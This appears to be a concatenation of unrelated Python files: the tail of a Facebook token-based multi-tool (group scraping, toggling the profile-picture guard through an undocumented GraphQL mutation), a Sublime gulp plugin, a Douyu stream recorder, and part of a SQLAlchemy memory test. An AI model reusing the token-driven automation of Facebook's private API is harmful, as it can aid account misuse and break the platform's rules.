raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
gulp.py
|
import sublime
import sublime_plugin
import traceback
import codecs
import os
from datetime import datetime
from threading import Thread
import json
import webbrowser
is_sublime_text_3 = int(sublime.version()) >= 3000
if is_sublime_text_3:
from .base_command import BaseCommand
from .settings import Settings
from .progress_notifier import ProgressNotifier
from .cross_platform_process import CrossPlatformProcess
from .hasher import Hasher
from .gulp_version import GulpVersion
from .plugins import PluginList, PluginRegistryCall
from .caches import ProcessCache, CacheFile
from .status_bar import StatusBar
from .timeout import set_timeout, defer, defer_sync, async
else:
from base_command import BaseCommand
from settings import Settings
from progress_notifier import ProgressNotifier
from cross_platform_process import CrossPlatformProcess
from hasher import Hasher
from gulp_version import GulpVersion
from plugins import PluginList, PluginRegistryCall
from caches import ProcessCache, CacheFile
from status_bar import StatusBar
from timeout import set_timeout, defer, defer_sync, async
#
# Commands
#
class GulpCommand(BaseCommand):
log_file_name = 'sublime-gulp.log'
allowed_extensions = [".babel.js", ".js"]
def work(self):
self.folders = []
self.gulp_files = []
self.list_gulp_files()
def list_gulp_files(self):
self.append_paths()
if not self.check_for_gulpfile:
self.gulp_files = self.folders
if len(self.gulp_files) > 0:
self.choose_file()
else:
sufix = "on:\n- %s" % "\n- ".join(self.searchable_folders) if len(self.searchable_folders) > 0 else ""
if not self.settings.get("recursive_gulpfile_search", False):
sufix += '\n\nCheck the recursive_gulpfile_search setting for nested gulpfiles'
self.error_message("gulpfile not found %s" % sufix)
def append_paths(self):
gulpfile_paths = self.settings.get("gulpfile_paths", [])
ignored_gulpfile_folders = self.settings.get("ignored_gulpfile_folders", [])
if self.settings.get("recursive_gulpfile_search", False):
for folder_path in self.searchable_folders:
for dir, dirnames, files in os.walk(folder_path):
dirnames[:] = [dirname for dirname in dirnames if dirname not in ignored_gulpfile_folders]
self.append_to_gulp_files(dir)
else:
for folder_path in self.searchable_folders:
self.append_to_gulp_files(folder_path)
for inner_folder in gulpfile_paths:
if(os.name == 'nt'):
inner_folder = inner_folder.replace("/", "\\")
self.append_to_gulp_files(os.path.join(folder_path, inner_folder))
def append_to_gulp_files(self, folder_path):
gulpfile_path = self.get_gulpfile_path(folder_path)
self.folders.append(folder_path)
if os.path.exists(gulpfile_path) and gulpfile_path not in self.gulp_files:
self.gulp_files.append(gulpfile_path)
def choose_file(self):
if len(self.gulp_files) == 1:
self.show_tasks_from_gulp_file(0)
else:
self.show_quick_panel(self.gulp_files, self.show_tasks_from_gulp_file)
def show_tasks_from_gulp_file(self, file_index):
if file_index > -1:
self.working_dir = self.gulp_files[file_index]
if self.task_name is not None:
self.run_gulp_task()
else:
defer(self.show_tasks)
def show_tasks(self):
self.tasks = self.list_tasks()
if self.tasks is not None:
self.show_quick_panel(self.tasks, self.task_list_callback)
def list_tasks(self):
try:
self.callcount = 0
json_result = self.fetch_json()
except TypeError as e:
self.error_message("Could not read available tasks.\nMaybe the JSON cache (.sublime-gulp.cache) is malformed?")
except Exception as e:
print(traceback.format_exc())
self.error_message(str(e))
else:
tasks = [[name, self.dependencies_text(task)] for name, task in json_result.items()]
return sorted(tasks, key=lambda task: task)
def dependencies_text(self, task):
return "Dependencies: " + task['dependencies'] if task['dependencies'] else ""
def fetch_json(self):
cache_file = CacheFile(self.working_dir)
gulpfile = self.get_gulpfile_path(self.working_dir)
data = None
if cache_file.exists():
filesha1 = Hasher.sha1(gulpfile)
data = cache_file.read()
if gulpfile in data and data[gulpfile]["sha1"] == filesha1:
return data[gulpfile]["tasks"]
self.callcount += 1
if self.callcount == 1:
return self.write_to_cache()
if data is None:
raise Exception("Could not write to cache gulpfile.")
if gulpfile in data:
raise Exception("Sha1 from gulp cache ({0}) is not equal to calculated ({1}).\nTry erasing the cache and running Gulp again.".format(data[gulpfile]["sha1"], filesha1))
else:
raise Exception("Have you renamed a folder?.\nSometimes Sublime doesn't update the project path, try removing the folder from the project and adding it again.")
def write_to_cache(self):
process = CrossPlatformProcess(self.working_dir)
(stdout, stderr) = process.run_sync(r'node "%s/write_tasks_to_cache.js"' % self.settings.package_path())
if process.failed:
try:
self.write_to_cache_without_js()
except:
if process.returncode() == 127:
raise Exception("\"node\" command not found.\nPlease be sure to have nodejs installed on your system and in your PATH (more info in the README).")
elif stderr:
self.log_errors(stderr)
raise Exception("There was an error running gulp, make sure gulp is running correctly in your project.\nFor more info check the sublime-gulp.log file")
return self.fetch_json()
def write_to_cache_without_js(self):
process = CrossPlatformProcess(self.working_dir)
(stdout, stderr) = process.run_sync(r'gulp -v')
if process.failed or not GulpVersion(stdout).supports_tasks_simple():
raise Exception("Gulp: Could not get the current gulp version or your gulp CLI version is lower than 3.7.0")
(stdout, stderr) = process.run_sync(r'gulp --tasks-simple')
gulpfile = self.get_gulpfile_path(self.working_dir)
if not stdout:
raise Exception("Gulp: The result of `gulp --tasks-simple` was empty")
CacheFile(self.working_dir).write({
gulpfile: {
"sha1": Hasher.sha1(gulpfile),
"tasks": dict((task, { "name": task, "dependencies": "" }) for task in stdout.split("\n") if task)
}
})
def get_gulpfile_path(self, base_path):
for extension in GulpCommand.allowed_extensions:
gulpfile_path = os.path.join(base_path, "gulpfile" + extension)
if os.path.exists(gulpfile_path):
return os.path.normpath(gulpfile_path)
return gulpfile_path
def log_errors(self, text):
if not self.settings.get("log_errors", True):
return
log_path = os.path.join(self.working_dir, GulpCommand.log_file_name)
header = "Remember that you can report errors and get help in https://github.com/nicosantangelo/sublime-gulp" if not os.path.isfile(log_path) else ""
timestamp = str(datetime.now().strftime("%m-%d-%Y %H:%M"))
with codecs.open(log_path, "a", "utf-8", errors='replace') as log_file:
log_file.write(header + "\n\n" + timestamp + ":\n" + text)
def task_list_callback(self, task_index):
if task_index > -1:
self.task_name = self.tasks[task_index][0]
self.task_flag = self.get_flag_from_task_name()
self.run_gulp_task()
def run_gulp_task(self):
task = self.construct_gulp_task()
Thread(target=self.run_process, args=(task, )).start()
def construct_gulp_task(self):
self.show_running_status_in_output_panel()
return r"gulp %s %s" % (self.task_name, self.task_flag)
def run_process(self, task):
process = CrossPlatformProcess(self.working_dir)
process.run(task)
self.status_bar.update()
stdout, stderr = process.communicate(self.append_to_output_view_in_main_thread)
defer_sync(lambda: self.finish(stdout, stderr))
def finish(self, stdout, stderr):
finish_message = "gulp %s %s finished %s" % (self.task_name or '', self.task_flag, "with some errors." if stderr else "!")
self.status_message(finish_message)
self.status_bar.update()
if not self.silent:
self.set_output_close_on_timeout()
elif stderr and self.settings.get("show_silent_errors", False):
self.silent = False
self.show_running_status_in_output_panel()
self.append_to_output_view(stdout)
self.append_to_output_view(stderr)
self.silent = True
def show_running_status_in_output_panel(self):
with_flag_text = (' with %s' % self.task_flag) if self.task_flag else ''
self.show_output_panel("Running '%s'%s...\n" % (self.task_name, with_flag_text))
class GulpArbitraryCommand(GulpCommand):
def show_tasks_from_gulp_file(self, file_index):
if file_index > -1:
self.working_dir = self.gulp_files[file_index]
self.show_input_panel(caption="gulp", on_done=self.after_task_input)
def after_task_input(self, task_name=None):
if task_name:
self.task_name = task_name
self.task_flag = ''
self.run_gulp_task()
class GulpLastCommand(BaseCommand):
def work(self):
if ProcessCache.last_task_name:
task_name = ProcessCache.last_task_name
self.window.run_command("gulp", { "task_name": task_name })
else:
self.status_message("You need to run a task first")
class GulpKillTaskCommand(BaseCommand):
def work(self):
ProcessCache.refresh()
if ProcessCache.empty():
self.status_message("There are no running tasks")
else:
self.procs = ProcessCache.get()
quick_panel_list = [[process.last_command, process.working_dir, 'PID: %d' % process.pid] for process in self.procs]
self.show_quick_panel(quick_panel_list, self.kill_process, font=0)
def kill_process(self, index=-1):
if index >= 0 and index < len(self.procs):
process = self.procs[index]
try:
process.kill()
except ProcessLookupError as e:
print('Process %d seems to be dead already' % process.pid)
self.show_output_panel('')
self.append_to_output_view("\n%s killed! # %s | PID: %d\n" % process.to_tuple())
class GulpKillCommand(BaseCommand):
def work(self):
ProcessCache.refresh()
if ProcessCache.empty():
self.status_message("There are no running tasks")
else:
self.append_processes_to_output_view()
ProcessCache.kill_all()
self.append_to_output_view("\nAll running tasks killed!\n")
def append_processes_to_output_view(self):
self.show_output_panel("\nFinishing the following running tasks:\n")
ProcessCache.each(lambda process: self.append_to_output_view("$ %s # %s | PID: %d\n" % process.to_tuple()))
class GulpShowPanelCommand(BaseCommand):
def work(self):
self.show_panel()
class GulpHidePanelCommand(BaseCommand):
def work(self):
self.close_panel()
class GulpPluginsCommand(BaseCommand):
def work(self):
self.plugins = None
self.request_plugin_list()
def request_plugin_list(self):
progress = ProgressNotifier("%s: Working" % Settings.PACKAGE_NAME)
thread = PluginRegistryCall()
thread.start()
self.handle_thread(thread, progress)
def handle_thread(self, thread, progress):
if thread.is_alive() and not thread.error:
set_timeout(lambda: self.handle_thread(thread, progress), 100)
else:
progress.stop()
if thread.result:
plugin_response = json.loads(thread.result.decode('utf-8'))
self.plugins = PluginList(plugin_response)
self.show_quick_panel(self.plugins.quick_panel_list(), self.open_in_browser, font=0)
else:
self.error_message(self.error_text_for(thread))
def error_text_for(self, thread):
error_tuple = (
"The plugin repository seems to be down.",
"If http://gulpjs.com/plugins is working, please report this issue at the Sublime Gulp repo (https://github.com/nicosantangelo/sublime-gulp).",
"Thanks!",
thread.error
)
return "\n\n%s\n\n%s\n\n%s\n\n%s" % error_tuple
def open_in_browser(self, index=-1):
if index >= 0 and index < self.plugins.length:
webbrowser.open_new(self.plugins.get(index).get('homepage'))
class GulpDeleteCacheCommand(GulpCommand):
def choose_file(self):
if len(self.gulp_files) == 1:
self.delete_cache(0)
else:
self.show_quick_panel(self.gulp_files, self.delete_cache)
def delete_cache(self, file_index):
if file_index > -1:
self.working_dir = self.gulp_files[file_index]
try:
cache_file = CacheFile(self.working_dir)
if cache_file.exists():
cache_file.remove()
self.status_message('Cache removed successfully')
except Exception as e:
self.status_message("Could not remove cache: %s" % str(e))
class GulpExitCommand(sublime_plugin.WindowCommand):
def run(self):
try:
self.window.run_command("gulp_kill")
finally:
self.window.run_command("exit")
class GulpUpdateStatusBarCommand(sublime_plugin.TextCommand):
def run(self, edit):
if self.view.settings().get('is_widget'):
return
window = self.view.window()
if not window or \
(self.view.file_name() and
self.view == window.transient_view_in_group(window.active_group())):
# it means it is an transient view of a regular file
return
StatusBar(window).update()
def plugin_loaded():
def load_process_cache():
for process in ProcessCache.get_from_storage():
ProcessCache.add(
CrossPlatformProcess(process['working_dir'], process['last_command'], process['pid'])
)
async(load_process_cache, 200, silent=True)
if not is_sublime_text_3:
plugin_loaded()
|
run_win.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import re
import time
import shutil
import subprocess
from threading import Thread
from datetime import datetime
from api import douyu_opencdn
from utils.common import makesure_dir
from utils.common import kill_pid
from utils.common import list_only_dir
from utils.common import log_init
from utils.common import log_print
from utils.common import get_delta_minute
from utils.common import exist_cmd
from utils.common import ping
from utils.site import make_site_cover
from utils.site import make_site_screenshot
from utils.site import make_site_moment
from utils.site import get_topN_moments
from utils.site import remove_site_moment
from utils.ffmpeg import remake_video
from utils.ffmpeg import reencode_video
from utils.ffmpeg import flv_to_mp4
from utils.baiducloud import CloudManager
from utils.danmu_analysis import get_moment
from utils.danmu_file_maker import DanMuFileMaker
from win10toast import ToastNotifier
# Global Settings
# Live Settings
live_id = 'zard'
live_id_num = '60937'
live_online = False
sleep_sec = 30
live_max_minute = 120
danmu_record = None
max_moments = []
# reencode machine
use_reencode = True
reencode_host = 'YANETUT_PC'
reencode_path = '\\\\%s\\src\\' % reencode_host
# win10 toast
toaster = ToastNotifier()
toast_title = live_id.upper()
toast_info = '翔哥开播啦!!'
toast_ico_path = '%s.ico' % live_id
# Dir and File Settings
dir_home = os.getcwd()
# log dir
dir_log = os.path.join(dir_home, 'log')
log_file = os.path.join(dir_log, 'run_%s.log' % (live_id))
# local dir
dir_local = os.path.join(dir_home, 'local')
dir_live = os.path.join(dir_local, 'live', live_id)
dir_danmu = os.path.join(dir_local, 'danmu')
# site dir
site_dir = os.path.join(dir_local, 'site')
dir_site_cover = os.path.join(site_dir, 'cover')
dir_site_screenshot = os.path.join(site_dir, 'screenshot')
dir_site_moment = os.path.join(site_dir, 'moment')
# local sync dir
dir_cloud = os.path.join(dir_home, 'cloud')
dir_cloud_live = os.path.join(dir_cloud, 'live', live_id)
dir_cloud_danmu = os.path.join(dir_cloud, 'danmu', live_id)
dir_cloud_site = os.path.join(dir_cloud, 'site')
dir_cloud_site_cover = os.path.join(dir_cloud_site, 'cover')
dir_cloud_site_screenshot = os.path.join(dir_cloud_site, 'screenshot')
dir_cloud_site_moment = os.path.join(dir_cloud_site, 'moment')
def start_you_get(filename, live_date_dir):
# downloader output
downloader_out_file = os.path.join(dir_log, 'downloader_%s.out' % (live_id))
with open(downloader_out_file, 'w+', encoding='utf-8') as downloader_out:
# downloader you-get
cmd = ('you-get -o %s -O %s.flv %s%s' % (live_date_dir, filename,
douyu_opencdn.URL_LIVE_DOUYU, live_id_num))
you_get_proc = subprocess.Popen(cmd,
stdout=downloader_out,
stderr=downloader_out)
# 等待you-get成功或错误超时
with open(downloader_out_file, 'r', encoding='utf-8',
errors='ignore') as outfile:
line = outfile.readline()
line_count = 1
while (not re.match(r'.*time=.*', line)
and line_count <= 800
and you_get_proc.poll() is None):
time.sleep(0.1)
line = outfile.readline()
line_count += 1
# 判断匹配上还是超时或错误输出
if line_count > 800 or you_get_proc.poll() is not None:
# you-get 失败,返回None
# kill_pid(you_get_proc.pid)
you_get_proc = None
log_print('you-get FAILED,total_line: %d' % line_count)
# you-get正常
else:
log_print('you-get SUCCESS,total_line: %d' % line_count)
return you_get_proc
def wait_record_live():
date_live = datetime.now().date().isoformat()
dir_live_date = os.path.join(dir_live, date_live)
makesure_dir(dir_live_date)
live_time_start = time.strftime('%H-%M', time.localtime())
you_get_proc = start_you_get(live_time_start, dir_live_date)
if you_get_proc is not None:
live_file = os.path.join(dir_live_date, '%s.flv' % live_time_start)
# start_record_danmu
danmu_url = '%s%s' % (douyu_opencdn.URL_LIVE_DOUYU, live_id_num)
dmfm = DanMuFileMaker(danmu_url, dir_live_date)
dmfm.start()
try:
you_get_proc.wait(live_max_minute * 60)
except subprocess.TimeoutExpired:
kill_pid(you_get_proc.pid)
dmfm.stop()
# record live offline date and time
live_time_stop = time.strftime('%H-%M', time.localtime())
name_format = '%s__%s_%s' % (live_id, live_time_start, live_time_stop)
log_print('stop record live, name: %s' % name_format)
# live文件重命名添加结束时间
ret = False
try_time = 3
try_wait = 5
while not ret and try_time:
try:
if os.path.exists(live_file):
new_file = os.path.join(os.path.dirname(live_file),
'%s.flv' % name_format)
os.rename(live_file, new_file)
ret = True
except:
log_print('rename error and wait', lv=1)
ret = False
try_time -= 1
time.sleep(try_wait)
danmu_file = os.path.join(dir_live_date, '%s.xml' % live_id_num)
ret = False
try_time = 3
while not ret and try_time:
try:
if os.path.exists(danmu_file):
new_file = os.path.join(os.path.dirname(danmu_file),
'%s.xml' % name_format)
os.rename(danmu_file, new_file)
ret = True
except:
log_print('rename error and wait', lv=1)
ret = False
try_time -= 1
time.sleep(try_wait)
else:
time.sleep(4)
def check_live_upload():
log_print('check live upload')
dir_list = sorted(list_only_dir(dir_live))
todo_live_list = []
if dir_list:
for dir_name in dir_list:
ldir = os.path.join(dir_live, dir_name)
for f in os.listdir(ldir):
if re.match('^{live_id}__.*$'.format(live_id = live_id), f):
todo_live_list.append(os.path.join(ldir, f))
log_print('add live file: %s' % os.path.join(ldir, f))
for live_file in todo_live_list:
if re.match('.*.flv$', live_file):
# use reencode machine
if use_reencode and ping(reencode_host):
continue
if exist_cmd('ffmpeg_g.exe'):
# PC上直接GPU转码
log_print('reencode live video file: %s' % live_file)
# reencode_video(live_file, gpu=True)
reencode_video(live_file, gpu=False)
else:
# miniPC上不转码
duration_minute = get_delta_minute(
os.path.basename(live_file))
if duration_minute > live_max_minute - 5:
log_print('remake live video file: %s' % live_file)
remake_video(live_file)
return todo_live_list
def check_site_upload(cloud_manager):
global max_moments
live_dates = sorted(os.listdir(dir_site_moment))
if live_dates:
live_date = live_dates[0]
date_now = datetime.now().date()
date_live = datetime.strptime(live_date, '%Y-%m-%d').date()
lives = os.listdir(dir_live)
if not live_online and date_now > date_live and not lives:
# if not live_online and not lives:
# make site cover
moment_dir = os.path.join(dir_site_moment, live_date)
make_site_cover(moment_dir,
os.path.join(dir_site_cover, live_date))
# save room_info json file
json_file = os.path.join(dir_site_cover, live_date,
'room_info.json')
if not os.path.exists(json_file):
retry = 4
for r in range(retry):
ret = douyu_opencdn.save_json(live_id_num, json_file)
log_print('save room info json {ret}.'.format(
ret = ret))
if ret:
break
# covert moment flv to mp4
top_moment_files = os.listdir(moment_dir)
for f in top_moment_files:
if re.match(r'.*\.flv$', f):
ret = flv_to_mp4(os.path.join(moment_dir, f))
log_print('flv to mp4 {fname}:{ret}'.format(
fname = f,
ret = ret
))
if not ret:
# rename
name_mp4 = f[:-4] + '.mp4'
os.rename(os.path.join(moment_dir, f),
os.path.join(moment_dir, name_mp4))
# upload site folders
# move to dir_cloud by yourself
shutil.move(os.path.join(dir_site_cover, live_date),
dir_cloud_site_cover)
shutil.move(os.path.join(dir_site_screenshot, live_date),
dir_cloud_site_screenshot)
shutil.move(os.path.join(dir_site_moment, live_date),
dir_cloud_site_moment)
max_moments = []
cloud_manager.add_cloud(os.path.join(dir_cloud_site_cover,
live_date))
cloud_manager.add_cloud(os.path.join(dir_cloud_site_screenshot,
live_date))
cloud_manager.add_cloud(os.path.join(dir_cloud_site_moment,
live_date))
if not danmu_record:
shutil.move(os.path.join(dir_danmu, live_date),
dir_cloud_danmu)
cloud_manager.add_cloud(os.path.join(dir_cloud_danmu,
live_date))
def work_record_live():
global live_online
while True:
live_online = douyu_opencdn.is_room_online(live_id_num)
log_print('live online: %s' % live_online)
if live_online:
wait_record_live()
else:
time.sleep(sleep_sec)
def work_record_danmu():
offline_delay_max = 6
offline_delay = 0
global danmu_record
while True:
if live_online:
if not danmu_record:
toaster.show_toast( toast_title,
toast_info,
icon_path=toast_ico_path,
duration=10,
threaded=True)
live_date = sorted(os.listdir(dir_live))[0]
danmu_dir = os.path.join(dir_danmu, live_date)
makesure_dir(danmu_dir)
live_time_start = time.strftime('%H-%M', time.localtime())
danmu_url = '%s%s' % (douyu_opencdn.URL_LIVE_DOUYU, live_id_num)
danmu_record = DanMuFileMaker(danmu_url, danmu_dir)
log_print('start record danmu')
danmu_record.start()
else:
if offline_delay > offline_delay_max and danmu_record:
log_print('stop record danmu')
danmu_record.stop()
live_time_stop = time.strftime('%H-%M', time.localtime())
name_format = '%s__%s_%s' % (live_id, live_time_start,
live_time_stop)
danmu_file = danmu_record.danmu_file
if os.path.exists(danmu_file):
try:
new_file = os.path.join(os.path.dirname(danmu_file),
'%s.xml' % name_format)
os.rename(danmu_file, new_file)
except FileExistsError:
log_print('FileExistsError danmufile', lv=1)
offline_delay = 0
danmu_record = None
else:
offline_delay += 1
time.sleep(sleep_sec)
def work_upload():
global max_moments
cloud_manager = CloudManager(live_id, dir_cloud_live, dir_cloud_site_cover,
dir_cloud_site_screenshot, dir_cloud_site_moment, dir_cloud_danmu)
# init max_moments
res = list_only_dir(dir_site_moment)
if res:
moment_date = res[0]
moment_dir = os.path.join(dir_site_moment, moment_date)
moment_files_name = os.listdir(moment_dir)
for moment_name in moment_files_name:
if re.match(r'.*\.xml$', moment_name):
max_moments.append(get_moment(moment_name, moment_dir))
while True:
todo_live_list = check_live_upload()
if todo_live_list:
log_print('upload list: %s' % todo_live_list)
if list_only_dir(dir_site_moment):
live_date = sorted(list_only_dir(dir_site_moment))[0]
else:
live_date = sorted(list_only_dir(dir_live))[0]
# do some site work
# screenshot
screenshot_dir = os.path.join(dir_site_screenshot, live_date)
make_site_screenshot(todo_live_list, screenshot_dir)
# moment
moments = []
for live_file in todo_live_list:
if re.match(r'.*\.xml$', live_file):
moments += get_topN_moments(live_file, 180, 3)
# new moments
new_max_moments = []
moments += max_moments
if len(moments) > 3:
for i in range(3):
max_moment = moments[0]
max_count = max_moment['max_count']
for moment in moments:
if moment['max_count'] > max_count:
max_count = moment['max_count']
max_moment = moment
new_max_moments.append(max_moment)
moments.remove(max_moment)
else:
new_max_moments = moments
need_delete_moments = [m for m in max_moments if not m in new_max_moments]
need_make_moments = [m for m in new_max_moments if not m in max_moments]
log_print('need_delete_moments: %s' % need_delete_moments)
log_print('need_make_moments: %s' % need_make_moments)
moment_dir = os.path.join(dir_site_moment, live_date)
makesure_dir(moment_dir)
for moment in need_delete_moments:
try:
remove_site_moment(moment, moment_dir)
except:
log_print('Error in delete moments {moment}'.format(
moment = moment['max_time_start']
), lv=1)
for moment in need_make_moments:
make_site_moment(moment, moment_dir)
max_moments = new_max_moments
# move to cloud dir
for live_file in todo_live_list:
local_upload = True
todo_date = os.path.basename(os.path.dirname(live_file))
if use_reencode and re.match('.*.flv$', live_file) and ping(reencode_host):
try:
fname = os.path.basename(live_file)
dir_reencode_live_date = os.path.join(reencode_path, todo_date)
dst_file_temp = os.path.join(dir_reencode_live_date, fname + '.temp')
dst_file = os.path.join(dir_reencode_live_date, fname)
makesure_dir(dir_reencode_live_date)
shutil.move(live_file, dst_file_temp)
os.rename(dst_file_temp, dst_file)
log_print('upload to reencode %s SUCCESS' % live_file)
local_upload = False
except Exception as e:
log_print(e, lv=1)
local_upload = True
if local_upload:
dir_cloud_live_date = os.path.join(dir_cloud_live, todo_date)
makesure_dir(dir_cloud_live_date)
shutil.move(live_file, dir_cloud_live_date)
cloud_manager.add_cloud(dir_cloud_live_date)
# rm empty lives dir
live_dates = list_only_dir(dir_live)
for live_date in live_dates:
dir_live_date = os.path.join(dir_live, live_date)
if not os.listdir(dir_live_date) and not live_online:
log_print('rmdir %s' % dir_live_date)
try:
os.rmdir(dir_live_date)
except PermissionError:
log_print('PermissionError %s' % dir_live_date)
cloud_manager.check_upload()
# live end upload site and danmu
check_site_upload(cloud_manager)
time.sleep(300)
def main():
# dir settings
makesure_dir(dir_log)
makesure_dir(dir_live)
makesure_dir(dir_site_cover)
makesure_dir(dir_site_screenshot)
makesure_dir(dir_site_moment)
makesure_dir(dir_cloud_live)
makesure_dir(dir_cloud_danmu)
makesure_dir(dir_cloud_site_cover)
makesure_dir(dir_cloud_site_screenshot)
makesure_dir(dir_cloud_site_moment)
# log file setting
log_init(log_file)
t_record_live = Thread(target=work_record_live)
t_record_danmu = Thread(target=work_record_danmu)
t_upload = Thread(target=work_upload)
t_record_live.start()
time.sleep(10)
t_record_danmu.start()
t_upload.start()
if __name__ == '__main__':
main()
|
test_memusage.py
|
import decimal
import gc
import itertools
import multiprocessing
import weakref
import sqlalchemy as sa
from sqlalchemy import ForeignKey
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy import Unicode
from sqlalchemy import util
from sqlalchemy.engine import result
from sqlalchemy.engine.processors import to_decimal_processor_factory
from sqlalchemy.orm import aliased
from sqlalchemy.orm import clear_mappers
from sqlalchemy.orm import configure_mappers
from sqlalchemy.orm import declarative_base
from sqlalchemy.orm import join as orm_join
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import Load
from sqlalchemy.orm import relationship
from sqlalchemy.orm import selectinload
from sqlalchemy.orm import Session
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import subqueryload
from sqlalchemy.orm.session import _sessions
from sqlalchemy.sql import column
from sqlalchemy.sql import util as sql_util
from sqlalchemy.sql.visitors import cloned_traverse
from sqlalchemy.sql.visitors import replacement_traverse
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from sqlalchemy.testing.util import gc_collect
from ..orm import _fixtures
class A(fixtures.ComparableEntity):
pass
class B(fixtures.ComparableEntity):
pass
class ASub(A):
pass
def assert_cycles(expected=0):
def decorate(fn):
def go():
fn() # warmup, configure mappers, caches, etc.
gc_collect()
gc_collect()
gc_collect() # multiple calls seem to matter
# gc.set_debug(gc.DEBUG_COLLECTABLE)
try:
return fn() # run for real
finally:
unreachable = gc_collect()
assert unreachable <= expected
gc_collect()
return go
return decorate
def profile_memory(
maxtimes=250, assert_no_sessions=True, get_num_objects=None
):
def decorate(func):
# run the test N times. if length of gc.get_objects()
# keeps growing, assert false
def get_objects_skipping_sqlite_issue():
# pysqlite keeps adding weakref objects which only
# get reset after 220 iterations. We'd like to keep these
# tests under 50 iterations and ideally about ten, so
# just filter them out so that we get a "flatline" more quickly.
if testing.against("sqlite+pysqlite"):
return [
o
for o in gc.get_objects()
if not isinstance(o, weakref.ref)
]
else:
return gc.get_objects()
def profile(queue, func_args):
# give testing.db a brand new pool and don't
# touch the existing pool, since closing a socket
# in the subprocess can affect the parent
testing.db.pool = testing.db.pool.recreate()
gc_collect()
samples = []
max_ = 0
max_grew_for = 0
success = False
until_maxtimes = 0
try:
while True:
if until_maxtimes >= maxtimes // 5:
break
for x in range(5):
try:
func(*func_args)
except Exception as err:
queue.put(
(
"result",
False,
"Test raised an exception: %r" % err,
)
)
raise
gc_collect()
samples.append(
get_num_objects()
if get_num_objects is not None
else len(get_objects_skipping_sqlite_issue())
)
if assert_no_sessions:
assert len(_sessions) == 0, "%d sessions remain" % (
len(_sessions),
)
# queue.put(('samples', samples))
latest_max = max(samples[-5:])
if latest_max > max_:
queue.put(
(
"status",
"Max grew from %s to %s, max has "
"grown for %s samples"
% (max_, latest_max, max_grew_for),
)
)
max_ = latest_max
max_grew_for += 1
until_maxtimes += 1
continue
else:
queue.put(
(
"status",
"Max remained at %s, %s more attempts left"
% (max_, max_grew_for),
)
)
max_grew_for -= 1
if max_grew_for == 0:
success = True
break
except Exception as err:
queue.put(("result", False, "got exception: %s" % err))
else:
if not success:
queue.put(
(
"result",
False,
"Ran for a total of %d times, memory kept "
"growing: %r" % (maxtimes, samples),
)
)
else:
queue.put(("result", True, "success"))
def run_plain(*func_args):
import queue as _queue
q = _queue.Queue()
profile(q, func_args)
while True:
row = q.get()
typ = row[0]
if typ == "samples":
print("sample gc sizes:", row[1])
elif typ == "status":
print(row[1])
elif typ == "result":
break
else:
assert False, "can't parse row"
assert row[1], row[2]
# return run_plain
def run_in_process(*func_args):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=profile, args=(queue, func_args)
)
proc.start()
while True:
row = queue.get()
typ = row[0]
if typ == "samples":
print("sample gc sizes:", row[1])
elif typ == "status":
print(row[1])
elif typ == "result":
break
else:
assert False, "can't parse row"
proc.join()
assert row[1], row[2]
return run_in_process
return decorate
def assert_no_mappers():
clear_mappers()
gc_collect()
class EnsureZeroed(fixtures.ORMTest):
def setup_test(self):
_sessions.clear()
clear_mappers()
# enable query caching, however make the cache small so that
# the tests don't take too long. issues w/ caching include making
# sure sessions don't get stuck inside of it. However it will
# make tests like test_mapper_reset take a long time because mappers
